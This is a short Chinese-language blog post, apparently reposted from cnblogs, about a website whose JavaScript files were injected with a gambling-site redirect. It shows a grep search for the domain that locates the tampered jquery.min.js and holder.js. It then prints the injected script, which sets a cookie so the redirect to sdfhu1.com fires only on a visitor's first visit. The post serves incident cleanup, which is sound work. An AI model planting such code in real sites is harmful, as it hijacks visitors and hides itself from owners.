网站挂马情况处理
作者:互联网
现象:
第一次访问网站会自动跳转到第三方菠菜页面https://sdfhu1.com/481358.html,第二次访问就不会了。
原因:
网站js文件被挂马
解决办法:
根据https://sdfhu1.com/481358.html这个域名查找被挂马的文件
grep -rn "sdfhu1.com" *
找到了这两个文件,发现最后几行被添加了跳转第三方。
static/global/vendor/jquery/jquery.min.js:14: window.location.href='https://sdfhu1.com/481358.html'; static/js/holder.js:2989: window.location.href='https://sdfhu1.com/481358.html';
参考代码
var c = document.cookie;
if (c.indexOf('isfirstvisited=false') != -1) {
}
else {
var d = new Date();
d.setFullYear(d.getFullYear() + 1);
document.cookie = 'isfirstvisited=false;expires=' + d.toGMTString();
window.location.href='https://sdfhu1.com/33720.html';
}
标签:处理,挂马,js,网站,html,481358,https,sdfhu1,com 来源: https://www.cnblogs.com/John-2011/p/14966290.html